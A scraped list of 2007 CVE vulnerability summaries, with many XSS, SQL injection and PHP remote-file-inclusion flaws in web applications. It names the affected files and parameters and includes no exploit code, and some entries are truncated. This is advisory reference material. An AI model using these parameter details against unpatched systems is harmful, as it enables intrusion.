unknown [CVE-2007-2335] Cross-site scripting (XSS) vulnerability in the RSS feed reader functionality in Lunascape 4.1.3 build2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-2334] Nortel VPN Router (aka Contivity) 1000, 2000, 4000, and 5000 before 5_05.149, 5_05.3xx before 5_05.304, and 6.x before 6_05.140 has two template HTML files lacking certain verification tags, which allows remote attackers to access the administration interface and change the device configuration via certain requests. [CVE-2007-2310] Cross-site scripting (XSS) vulnerability in plugins/spaw/img_popup.php in BloofoxCMS 0.2.2 allows remote attackers to inject arbitrary web script or HTML via the img_url parameter. [CVE-2007-2309] Cross-site scripting (XSS) vulnerability in cas.php in FloweRS 2.0 allows remote attackers to inject arbitrary web script or HTML via the den parameter. NOTE: the provenance of this information is unknown [CVE-2007-2308] Cross-site scripting (XSS) vulnerability in cas.php in FloweRS 2.0 allows remote attackers to inject arbitrary web script or HTML via the rok parameter. [CVE-2007-2307] PHP remote file inclusion vulnerability in engine/engine.inc.php in WebKalk2 1.9.0 allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter. [CVE-2007-2306] Multiple cross-site scripting (XSS) vulnerabilities in the Virtual War (VWar) 1.5.0 R15 and earlier module for PHP-Nuke, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) memberlist parameter to extra/login.php and the (2) title parameter to extra/today.php. [CVE-2007-2300] Multiple cross-site scripting (XSS) vulnerabilities in Endy Kristanto Surat kabar / News Management Online (aka phpwebnews) 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the m_txt parameter to (1) iklan.php, (2) index.php, or (3) bukutamu.php. [CVE-2007-2294] The Manager Interface in Asterisk before 1.2.18 and 1.4.x before 1.4.3 allows remote attackers to cause a denial of service (crash) by using MD5 authentication to authenticate a user that does not have a password defined in manager.conf, resulting in a NULL pointer dereference. [CVE-2007-2290] Multiple PHP remote file inclusion vulnerabilities in B2 Weblog and News Publishing Tool 0.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the b2inc parameter to (1) b2archives.php, (2) b2categories.php, or (3) b2mail.php. NOTE: this may overlap CVE-2002-1466. [CVE-2007-2277] Session fixation vulnerability in Plogger allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-2272] PHP remote file inclusion vulnerability in docs/front-end-demo/cart2.php in Advanced Webhost Billing System (AWBS) 2.4.0 allows remote attackers to execute arbitrary PHP code via a URL in the workdir parameter. [CVE-2007-2266] Progress Webspeed Messenger allows remote attackers to read, create, modify, and execute arbitrary files by invoking webutil/_cpyfile.p in the WService parameter to (1) cgiip.exe or (2) wsisa.dll in scripts/, as demonstrated by using the save,editor options to create a new file using the fileName parameter. [CVE-2007-2265] Cross-site scripting (XSS) vulnerability in YA Book 0.98-alpha allows remote attackers to inject arbitrary web script or HTML via the City field in a sign action in index.php. [CVE-2007-2256] Cross-site scripting (XSS) vulnerability in you.php in TJSChat 0.95 allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-2248] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in Phorum before 5.1.22 allow remote attackers to inject arbitrary web script or HTML via the (1) group_id parameter in the groups module or (2) the smiley_id parameter in the smileys modsettings module. [CVE-2007-2245] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.10.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the fieldkey parameter to browse_foreigners.php or (2) certain input to the PMA_sanitize function. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2235] Multiple cross-site scripting (XSS) vulnerabilities in PunBB 1.2.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Referer HTTP header to misc.php or the (2) category name when deleting a category in admin_categories.php. [CVE-2007-2207] SQL injection vulnerability in contact/index.php in Ripe Website Manager 0.8.4 and earlier allows remote attackers to execute arbitrary SQL commands via the ripeformpost parameter. [CVE-2007-2206] Cross-site scripting (XSS) vulnerability in contact/index.php in Ripe Website Manager 0.8.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a leading "&lt [CVE-2007-2203] Cross-site scripting (XSS) vulnerability in Big Blue Guestbook allows remote attackers to inject arbitrary web script or HTML via the message field in the guestbook entry submission form. [CVE-2007-2202] PHP remote file inclusion vulnerability in inc_ACVS/SOAP/Transport.php in Accueil et Conseil en Visites et Sejours Web Services (ACVSWS) PHP5 (ACVSWS_PHP5) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the CheminInclude parameter. [CVE-2007-2199] PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter. [CVE-2007-2198] Cross-site scripting (XSS) vulnerability in LAN Management System (LMS) before 1.6.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving the OD parameter to contrib/formularz_przelewu_wplaty/druk.php. [CVE-2007-2191] Multiple cross-site scripting (XSS) vulnerabilities in freePBX 2.2.x allow remote attackers to inject arbitrary web script or HTML via the (1) From, (2) To, (3) Call-ID, (4) User-Agent, and unspecified other SIP protocol fields, which are stored in /var/log/asterisk/full and displayed by admin/modules/logfiles/asterisk-full-log.php. [CVE-2007-2190] PHP remote file inclusion vulnerability in admin/public/webpages.php in Eba News 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the filename parameter. [CVE-2007-2183] SQL injection vulnerability in index.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9 allows remote attackers to execute arbitrary SQL commands via the ring parameter. [CVE-2007-2181] PHP remote file inclusion vulnerability in admin/login.php in Webinsta FM Manager 0.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter, a different product and vector than CVE-2005-0748. [CVE-2007-2177] Stack-based buffer overflow in the Microgaming Download Helper ActiveX control (dlhelper.dll) before 7.2.0.19, and the WebHandler Class control, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2007-2171] Stack-based buffer overflow in the base64_decode function in GWINTER.exe in Novell GroupWise (GW) WebAccess before 7.0 SP2 allows remote attackers to execute arbitrary code via long base64 content in an HTTP Basic Authentication request. [CVE-2007-2153] Cross-site scripting (XSS) vulnerability in atmail.php in @Mail 5.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2007-2119] Cross-site scripting (XSS) vulnerability in boundary_rules.jsp in the Administration Front End for Oracle Enterprise (Ultra) Search, as used in Database Server 9.2.0.8, 10.1.0.5, and 10.2.0.2, and in Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to inject arbitrary HTML or web script via the EXPTYPE parameter, aka SES01. [CVE-2007-2102] Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vector than CVE-2006-6087. [CVE-2007-2101] FAC Guestbook 3.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/gbdb.mdb. NOTE: the provenance of this information is unknown [CVE-2007-2100] FAC Guestbook 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/Gdb.mdb. [CVE-2007-2099] Cross-site scripting (XSS) vulnerability in htdocs/php.php in OpenConcept Back-End CMS 0.4.7 allows remote attackers to inject arbitrary web script or HTML via the page[] parameter. [CVE-2007-2098] Multiple cross-site scripting (XSS) vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) pic and (2) gal parameters. [CVE-2007-2090] Cross-site scripting (XSS) vulnerability in index.php in TuMusika Evolution 1.6 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2007-2085] Cross-site scripting (XSS) vulnerability in oe2edit.cgi in oe2edit CMS allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2007-2078] DISPUTED PHP remote file inclusion vulnerability in index.php in Maian Weblog 3.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter. NOTE: this issue was disputed by a third party researcher, since the path_to_folder variable is initialized before use. [CVE-2007-2071] Multiple cross-site scripting (XSS) vulnerabilities in Open-gorotto 2.0a 2006/02/08 edition, 2006/03/19 edition, and 2006/04/07 edition before 20070416 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) pub/modules/d/_top.html [CVE-2007-2070] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart before 3.5.1 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) index.php or (2) checkout.php. [CVE-2007-2067] Multiple PHP remote file inclusion vulnerabilities in Marco Antonio Islas Cruz Web Slider (WebSlider) 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) index.php, (2) modules/pdf.php, (3) plugins/highlight.php, or (4) include/modules.php. [CVE-2007-2061] Cross-site scripting (XSS) vulnerability in check_login.asp in AfterLogic MailBee WebMail Pro 3.4 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2007-2048] Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system files via a .. (dot dot) in the resource parameter. [CVE-2007-2035] Cisco Wireless Control System (WCS) before 4.0.66.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain network organization data via a direct request for files in certain directories, aka Bug ID CSCsg04301. [CVE-2007-2016] Cross-site scripting (XSS) vulnerability in mysql/phpinfo.php in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the lang[] parameter. [CVE-2007-2013] Cross-site scripting (XSS) vulnerability in index.php in JEx-Treme Einfacher Passworschutz allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2007-2011] Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2007-1991] Cross-site scripting (XSS) vulnerability in mail/signup.asp in CmailServer WebMail 5.4.3, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the Comment parameter, a different vector than CVE-2007-1927. [CVE-2007-1989] Multiple cross-site scripting (XSS) vulnerabilities in DotClear before 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) post_id parameter to ecrire/trackback.php or the (2) tool_url parameter to tools/thememng/index.php. NOTE: some of these details are obtained from third party information. [CVE-2007-1988] Cross-site scripting (XSS) vulnerability in kernel/filters.inc.php in PHPEcho CMS 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-1977] Cross-site scripting (XSS) vulnerability in index_cms.php in holaCMS 1.4.10 allows remote attackers to inject arbitrary web script or HTML via the acuparam parameter. [CVE-2007-1969] Cross-site scripting (XSS) vulnerability in admin/modify.php in Sam Crew MyBlog remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-1966] Session fixation vulnerability in eXV2 CMS 2.0.4.3 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID cookie. [CVE-2007-1965] Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.0.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the set_lang parameter to (1) archive.php, (2) article.php, (3) index.php, or (4) topics.php. [CVE-2007-1957] Multiple PHP remote file inclusion vulnerabilities in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) allow remote attackers to execute arbitrary PHP code via a URL in the pageAll parameter to index.php in (1) template/Vert/, or (2) template/Noir/. [CVE-2007-1953] Session fixation vulnerability in onelook courts on-line allows remote attackers to hijack web sessions by setting a PHPSESSID cookie. [CVE-2007-1952] Session fixation vulnerability in onelook onebyone CMS allows remote attackers to hijack web sessions by setting a PHPSESSID cookie. [CVE-2007-1951] Session fixation vulnerability in onelook obo Shop allows remote attackers to hijack web sessions by setting a PHPSESSID cookie. [CVE-2007-1950] Cross-site scripting (XSS) vulnerability in index_cms.php in WebBlizzard CMS allows remote attackers to inject arbitrary web script or HTML via the Suchzeile parameter. [CVE-2007-1949] Session fixation vulnerability in WebBlizzard CMS allows remote attackers to hijack web sessions by setting a PHPSESSID cookie. [CVE-2007-1945] Unspecified vulnerability in the Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) before 6.1.0.7 has unknown impact and attack vectors. [CVE-2007-1944] The Java Message Service (JMS) in IBM WebSphere Application Server (WAS) before 6.1.0.7 allows attackers to cause a denial of service via unknown vectors involving the "double release [of] a bytebuffer input stream," possibly a double free vulnerability. [CVE-2007-1941] Cross-site scripting (XSS) vulnerability in the Active Content Filter feature in Domino Web Access (DWA) in IBM Lotus Notes before 6.5.6 and 7.x before 7.0.2 FP1 allows remote attackers to inject arbitrary web script or HTML via a multipart/related e-mail message, a different issue than CVE-2006-4843. [CVE-2007-1939] Cross-site scripting (XSS) vulnerability in the embedded webserver in Daniel Naber LanguageTool before 0.8.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving an error message, possibly the demultiplex method in HTTPServer.java. [CVE-2007-1938] Ichitaro 2005 through 2007, and possibly related products, allows remote attackers to have an unknown impact via unspecified vectors in a document distributed through e-mail or a web site, possibly due to a buffer overflow or cross-site scripting (XSS). [CVE-2007-1927] Cross-site scripting (XSS) vulnerability in signup.asp in CmailServer WebMail 5.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the POP3Mail parameter. [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log [CVE-2007-1919] Cross-site scripting (XSS) vulnerability in index.php in Arizona Dream Livre d'or (livor) 2.5 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2007-1905] Cross-site scripting (XSS) vulnerability in auth.php in Pineapple Technologies QuizShock 1.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via encoded special characters in the forward_to parameter, as demonstrated using "&lt [CVE-2007-1903] Cross-site scripting (XSS) vulnerability in search.php in SonicBB 1.0 allows remote attackers to inject arbitrary web script or HTML via the part parameter. [CVE-2007-1899] Multiple SQL injection vulnerabilities in myWebland myBloggie 2.1.6 allow remote attackers to execute arbitrary SQL commands via (1) the user_id parameter in a viewuser action to index.php, and allow remote authenticated administrators to execute arbitrary SQL commands via (2) the post_id parameter in an edit action to admin.php. [CVE-2007-1894] Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function. [CVE-2007-1882] qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment in HP Mercury Quality Center 9.0 build 9.1.0.4352 allows remote authenticated users to execute arbitrary SQL commands via the RunQuery method. [CVE-2007-1873] Cross-site scripting (XSS) vulnerability in Mephisto 0.7.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter to the search script. [CVE-2007-1872] Cross-site scripting (XSS) vulnerability in toendaCMS 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search id. [CVE-2007-1871] Cross-site scripting (XSS) vulnerability in chcounter 3.1.3 allows remote attackers to inject arbitrary web script or HTML via the login_name parameter to /stats/. [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450. [CVE-2007-1848] Cross-site scripting (XSS) vulnerability in admin/classes/ui.dta.php in Drake CMS allows remote attackers to inject arbitrary web script or HTML via the desc[][title] field. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We do not consider security reports valid until the first official release of Drake CMS." [CVE-2007-1836] The command line administration interface in Data Domain OS before 4.0.3.6 allows remote authenticated users to execute arbitrary commands via shell metacharacters in certain arguments to various commands, as demonstrated by the interface argument to the (1) ifconfig and (2) ping commands. [CVE-2007-1832] web-app.org WebAPP before 0.9.9.6 allows remote authenticated users to upload certain files (1) via a crafted filename or (2) by "using percent encoding in forms." [CVE-2007-1831] web-app.org WebAPP before 0.9.9.6 allows remote authenticated users to open files and write "wrong data" via a crafted QUERY_STRING. [CVE-2007-1830] Unspecified vulnerability in the Username Hijacking Patch 20070312 for web-app.org WebAPP 0.9.9.6 allows remote attackers to obtain administrative access via unknown vectors, related to "something overlooked in the original that was still overlooked in the patch", and possibly related to copying files to the user-lib and the "XSS and cookies exploit." [CVE-2007-1829] Multiple unspecified vulnerabilities in web-app.net WebAPP have unknown impact and attack vectors, described as "[having] other [security] issues too, not as bad as letting users take over your admin account, but bad too." [CVE-2007-1828] Multiple cross-site scripting (XSS) vulnerabilities in web-app.org WebAPP before 0.9.9.6 allow remote authenticated users to inject arbitrary web script or HTML via (1) the QUERY_STRING corresponding to drop downs or (2) various forms. [CVE-2007-1827] Multiple unspecified vulnerabilities in form input validation in web-app.org WebAPP before 0.9.9.6 allow remote authenticated users to corrupt data files, gain access to private files, and execute arbitrary code via "certain characters." [CVE-2007-1809] Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter to (1) cls_headline_prod.php, (2) cls_listorders.php, or (3) cls_viewpastorders.php in include/, different vectors than CVE-2007-1513. [CVE-2007-1802] Cross-site scripting (XSS) vulnerability in MailDwarf 3.01 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-1786] SQL injection vulnerability in Hitachi Collaboration - Online Community Management 01-00 through 01-30, as used in Groupmax Collaboration Portal, Groupmax Collaboration Web Client, uCosminexus Collaboration Portal, Cosminexus Collaboration Portal, and uCosminexus Content Manager, allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2007-1780] Cross-site scripting (XSS) vulnerability in the DHT shell (owdhtshell) in Overlay Weaver 0.5.9 to 0.5.11, when invoked with the -x option, allows remote attackers to inject arbitrary web script or HTML via fields in certain input forms. [CVE-2007-1779] Multiple SQL injection vulnerabilities in the MySQL back-end in Advanced Website Creator (AWC) before 1.9.0 might allow remote attackers to execute arbitrary SQL commands via unspecified parameters, related to use of mysql_escape_string instead of mysql_real_escape_string. [CVE-2007-1774] Multiple cross-site scripting (XSS) vulnerabilities in aBitWhizzy allow remote attackers to inject arbitrary web script or HTML via the d parameter to (1) whizzery/whizzypic.php or (2) whizzery/whizzylink.php. [CVE-2007-1771] PHP remote file inclusion vulnerability in manage/javascript/formjavascript.php in Ay System Solutions Web Content System (WCS) 2.7.1 allows remote attackers to execute arbitrary PHP code via a URL in the path[JavascriptEdit] parameter. [CVE-2007-1768] Cross-site scripting (XSS) vulnerability in app/helpers/application_helper.rb in Mephisto 0.7.3 and Mephisto Edge 20070325 allows remote attackers to inject arbitrary web script or HTML via the author name field in a comment. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1744] Directory traversal vulnerability in the Shared Folders feature for VMware Workstation before 5.5.4, when a folder is shared, allows users on the guest system to write to arbitrary files on the host system via the "Backdoor I/O Port" interface. [CVE-2007-1732] DISPUTED Cross-site scripting (XSS) vulnerability in an mt import in wp-admin/admin.php in WordPress 2.1.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the demo parameter. NOTE: the provenance of this information is unknown [CVE-2007-1723] Multiple cross-site scripting (XSS) vulnerabilities in the administration console in Secure Computing CipherTrust IronMail 6.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) network, (2) defRouterIp, (3) hostName, (4) domainName, (5) ipAddress, (6) defaultRouter, (7) dns1, or (8) dns2 parameter to (a) admin/system_IronMail.do [CVE-2007-1714] Cross-site scripting (XSS) vulnerability in index.php in CcCounter 2.0 allows remote attackers to inject arbitrary web script or HTML via dir parameter. [CVE-2007-1712] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Auction Pro 7.1 allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2007-1706] SQL injection vulnerability in eWebQuiz.asp in eWebQuiz 8 allows remote attackers to execute arbitrary SQL commands via the QuizID parameter. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1685] Buffer overflow in k9filter.exe in BlueCoat K9 Web Protection 3.2.36, and probably other versions before 3.2.44, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request to port 2372. [CVE-2007-1683] Stack-based buffer overflow in the DoWebMenuAction function in the IncrediMail IMMenuShellExt ActiveX control (ImShExt.dll) allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2007-1681] Format string vulnerability in libwebconsole_services.so in Sun Java Web Console 2.2.2 through 2.2.5 allows remote attackers to cause a denial of service (application crash), obtain sensitive information, and possibly execute arbitrary code via unspecified vectors during a failed login attempt, related to syslog. [CVE-2007-1679] DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware Webmail 1.0 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in (1) imp/search.php and (2) ingo/rule.php. NOTE: this issue has been disputed by the vendor, noting that the search.php issue was resolved in CVE-2006-4255, and attackers can only use rule.php to inject XSS into their own pages. [CVE-2007-1678] Cross-site scripting (XSS) vulnerability in the Fizzle 0.5 extension for Firefox allows remote attackers to inject arbitrary web script or HTML via RSS feeds, which are executed by the chrome: URI handler. [CVE-2007-1652] OpenID allows remote attackers to forcibly log a user into an OpenID enabled site, divulge the user's personal information to this site, and add it site to the trusted sites list via a crafted web page, related to cached tokens. [CVE-2007-1651] Cross-site request forgery (CSRF) vulnerability in OpenID allows remote attackers to restore the login session of a user on an OpenID enabled site via unspecified vectors related to an arbitrary remote web site and cached tokens, after the user has signed into an OpenID server, logged into the OpenID enabled site, and then logged out of the OpenID enabled site. [CVE-2007-1647] Moodle 1.5.2 and earlier stores sensitive information under the web root with insufficient access control, and provides directory listings, which allows remote attackers to obtain user names, password hashes, and other sensitive information via a direct request for session (sess_) files in moodledata/sessions/. [CVE-2007-1646] Multiple cross-site scripting (XSS) vulnerabilities in SubHub 2.3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the searchtext parameter to (a) /search, or the (2) message parameter to (b) /calendar or (c) /subscribe. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1640] Multiple PHP remote file inclusion vulnerabilities in ClassWeb 2.03 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the BASE parameter to (1) language.php and (2) phpadmin/survey.php. [CVE-2007-1637] Multiple buffer overflows in the IMAILAPILib ActiveX control (IMailAPI.dll) in Ipswitch IMail Server before 2006.2 allow remote attackers to execute arbitrary code via the (1) WebConnect and (2) Connect members in the (a) IMailServer control [CVE-2007-1632] Unspecified vulnerability in TYPOlight webCMS before 2.2 Build 5 has unknown impact and attack vectors related to a "major security hole." [CVE-2007-1630] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Link Engine allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2007-1629] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Photo Gallery allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2007-1625] Cross-site scripting (XSS) vulnerability in save_entry.php in realGuestbook 5.01 allows remote attackers to inject arbitrary web script or HTML via the homepage parameter, as reachable through add_entry.php. NOTE: the original report stated that the vulnerability was in add_entry.php, which does not receive the input data. [CVE-2007-1623] Multiple cross-site scripting (XSS) vulnerabilities in realGuestbook 5.01, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) bg_color_1, (2) fs_menu, (3) fc_menu, (4) ff_menu, (5) bg_color_2, (6) fs_normal, (7) fc_normal, and (8) ff_normal parameters to welcome_admin.php [CVE-2007-1611] Cross-site scripting (XSS) vulnerability in the RSS reader in a certain SOURCENEXT product, probably IKANARI JIJYOU 1.0.0 and 1.0.1, allows remote attackers to inject arbitrary web script or HTML via the title of an article in a feed. [CVE-2007-1610] Cross-site scripting (XSS) vulnerability in the RSS reader in Glue Software NewsGlue before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via a feed. [CVE-2007-1609] Cross-site scripting (XSS) vulnerability in servlet/Spy in Dynamic Monitoring Services (DMS) in Oracle Application Server (OAS) 10g 10.1.2.0.0 allows remote attackers to inject arbitrary web script or HTML via the table parameter. NOTE: This may be related to CVE-2002-0563. [CVE-2007-1608] CRLF injection vulnerability in IBM WebSphere Application Server (WAS) before 6.0.2.19 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a single CRLF sequence in a context that is not a valid multi-line header. [CVE-2007-1607] search.php in w-Agora (Web-Agora) allows remote attackers to obtain potentially sensitive information via a ' (quote) value followed by certain SQL sequences in the (1) search_forum or (2) search_user parameter, which force a SQL error. [CVE-2007-1606] Multiple cross-site scripting (XSS) vulnerabilities in w-Agora (Web-Agora) allow remote attackers to inject arbitrary web script or HTML via (1) the showuser parameter to profile.php, the (2) search_forum or (3) search_user parameter to search.php, or (4) the userid parameter to change_password.php. [CVE-2007-1605] w-Agora (Web-Agora) allows remote attackers to obtain sensitive information via a request to rss.php with an invalid (1) site or (2) bn parameter, (3) a certain value of the site[] parameter, or (4) an empty value of the bn[] parameter [CVE-2007-1604] Multiple unrestricted file upload vulnerabilities in w-Agora (Web-Agora) allow remote attackers to upload and execute arbitrary PHP code (1) via a forum message with an attached file, which is stored under forums/hello/hello/notes/ or (2) by using browse_avatar.php to upload a file with a double extension, as demonstrated by .php.jpg. [CVE-2007-1599] wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter. [CVE-2007-1597] Unclassified NewsBoard 1.6.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain (1) the board log via a direct request for logs/board-YYYY-MM-DD.log, (2) the mail and private message (PM) log via a direct request for logs/email-YY-MM-DD-HH-MM-SS.log, (3) the SQL error message log via a direct request for logs/error-YY-MM.log, and (4) the IP log via a direct request for logs/ip.log. [CVE-2007-1576] Multiple cross-site scripting (XSS) vulnerabilities in PHProjekt 5.2.0, when magic_quotes_gpc is disabled, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors to the (1) Projects, (2) Contacts, (3) Helpdesk, (4) Search (only Gecko engine driven Browsers), and (5) Notes modules [CVE-2007-1551] Multiple cross-site scripting (XSS) vulnerabilities in phpx 3.5.15 allow remote attackers to inject arbitrary web script or HTML via (1) the signature in "dans profile," or (2) search.php. [CVE-2007-1548] SQL injection vulnerability in functions/functions_filters.asp in Web Wiz Forums before 8.05a (MySQL version) does not properly filter certain characters in SQL commands, which allows remote attackers to execute arbitrary SQL commands via \"' (backslash double-quote quote) sequences, which are collapsed into \'', as demonstrated via the name parameter to forum/pop_up_member_search.asp. [CVE-2007-1526] Sun Java System Web Server 6.1 before 20070314 allows remote authenticated users with revoked client certificates to bypass the Certificate Revocation List (CRL) authorization control and access secure web server instances running under an account different from that used for the admin server via unspecified vectors. [CVE-2007-1519] Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke 8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the Downloads module, a different product than CVE-2006-3948. [CVE-2007-1515] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP H3 4.1.3, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via (1) the email Subject header in thread.php, (2) the edit_query parameter in search.php, or other unspecified parameters in search.php. NOTE: some of these details are obtained from third party information. [CVE-2007-1514] PHP remote file inclusion vulnerability in index.php in ViperWeb Portal alpha 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the modpath parameter. [CVE-2007-1513] PHP remote file inclusion vulnerability in comanda.php in GraFX Company WebSite Builder (CWB) PRO 1.9.8, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter. [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983. [CVE-2007-1506] Cross-site scripting (XSS) vulnerability in PORTAL.wwv_main.render_warning_screen in the Oracle Portal 10g allows remote attackers to inject arbitrary web script or HTML via the (1) p_oldurl and (2) p_newurl parameters. [CVE-2007-1504] Cross-site scripting (XSS) vulnerability in the Servlet Service in Fujitsu Interstage Application Server (IJServer) 8.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving web.xml and HTTP 404 and 500 status codes. [CVE-2007-1494] Cross-site scripting (XSS) vulnerability in NukeSentinel before 2.5.06 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the "filters for https:// and http://". [CVE-2007-1491] Apache Tomcat in Avaya S87XX, 